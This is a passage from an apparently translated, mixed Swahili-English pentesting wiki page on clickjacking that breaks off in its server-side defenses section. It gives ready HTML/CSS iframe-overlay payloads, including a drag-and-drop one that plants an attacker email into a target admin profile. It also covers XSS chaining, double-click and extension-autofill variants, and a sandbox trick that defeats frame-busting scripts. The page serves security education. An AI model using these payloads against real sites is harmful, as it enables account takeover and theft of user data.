Clickjacking

Reading time: 9 minutes

Clickjacking ni nini

Katika shambulio la Clickjacking, mtumiaji amedanganywa ili kubofya kipengee kwenye ukurasa wa wavuti ambacho ni visivyoonekana au kimefichwa kama kipengee tofauti. Ubadilishaji huu unaweza kusababisha matokeo yasiyokusudiwa kwa mtumiaji, kama vile kupakua malware, kupelekwa tena kwa kurasa za wavuti zenye madhara, kutoa nywila au taarifa za siri, uhamisho wa pesa, au kununua bidhaa mtandaoni.

Mbinu ya kujaza fomu awali

Wakati mwingine inawezekana kujaza thamani za nyanja za fomu kwa kutumia vigezo vya GET wakati wa kupakia ukurasa. Mshambuliaji anaweza kutumia vibaya tabia hii kujaza fomu kwa data yoyote na kutuma clickjacking payload ili mtumiaji abofye kitufe cha Submit.

Kujaza fomu kwa Drag&Drop

Ikiwa unahitaji mtumiaji kujaza fomu lakini hutaki kumwomba moja kwa moja aingize taarifa maalum (kama barua pepe au nywila maalum unayojua), unaweza kumuomba tu Drag&Drop kitu kitakachosajili data unayodhibiti, kama katika this example.

Payload ya Msingi

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Payload ya Hatua Nyingi

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Drag&Drop + Click payload

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

If you have identified an XSS attack that requires a user to click on some element to trigger the XSS and the page is vulnerable to clickjacking, you could abuse it to trick the user into clicking the button/link.
Mfano:
Umegundua a self XSS katika baadhi ya taarifa za akaunti za kibinafsi (taarifa ambazo ni wewe tu unaoweza kuziteua na kuzisoma). Ukurasa wenye form ya kuweka taarifa hizi uko vulnerable kwa Clickjacking na unaweza prepopulate form kwa vigezo vya GET.
Mshambulizi anaweza kuandaa shambulio la Clickjacking kwenye ukurasa huo kwa prepopulating form na XSS payload na kudanganya mtumiaji ili Submit form. Hivyo, wanapo-submit form na thamani zimebadilika, mtumiaji ataendesha XSS.

DoubleClickjacking

Firstly explained in this post, this technique would ask the victim to double click on a button of a custom page placed in a specific location, and use the timing differences between mousedown and onclick events to load the victim page duing the double click so the victim actually clicks a legit button in the victim page.
Mbinu hii inamwomba mwanaathiriwa kubofya mara mbili kwenye kitufe cha ukurasa maalum uliowekwa mahali fulani, na kutumia tofauti za muda kati ya matukio ya mousedown na onclick ili kupakia ukurasa wa mwanaathiriwa wakati wa bonyeza mara mbili hivyo mwanaathiriwa kwa kweli anabofya kitufe halali kwenye ukurasa wa mwanaathiriwa.

An example could be seen in this video: https://www.youtube.com/watch?v=4rGvRRMrD18

A code example can be found in this page.

Browser extensions: DOM-based autofill clickjacking

Aside from iframing victim pages, attackers can target browser extension UI elements that are injected into the page. Password managers render autofill dropdowns near focused inputs; by focusing an attacker-controlled field and hiding/occluding the extension’s dropdown (opacity/overlay/top-layer tricks), a coerced user click can select a stored item and fill sensitive data into attacker-controlled inputs. This variant requires no iframe exposure and works entirely via DOM/CSS manipulation.

• For concrete techniques and PoCs see:

BrowExt - ClickJacking

Strategies to Mitigate Clickjacking

Client-Side Defenses

Scripts executed on the client side can perform actions to prevent Clickjacking:

• Ensuring the application window is the main or top window.
• Making all frames visible.
• Preventing clicks on invisible frames.
• Detecting and alerting users to potential Clickjacking attempts.

Hata hivyo, script hizi za kuvunja frame zinaweza kupitwa:

• Browsers' Security Settings: Some browsers might block these scripts based on their security settings or lack of JavaScript support.
• HTML5 iframe sandbox Attribute: An attacker can neutralize frame buster scripts by setting the sandbox attribute with allow-forms or allow-scripts values without allow-top-navigation. This prevents the iframe from verifying if it is the top window, e.g.,

<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>

The allow-forms and allow-scripts values enable actions within the iframe while disabling top-level navigation. To ensure the intended functionality of the targeted site, additional permissions like allow-same-origin and allow-modals might be necessary, depending on the attack type. Browser console messages can guide which permissions to allow.

Ulinzi upande wa server

X-Frame-Options

The X-Frame-Options HTTP response header informs browsers about the legitimacy of rendering a page in a or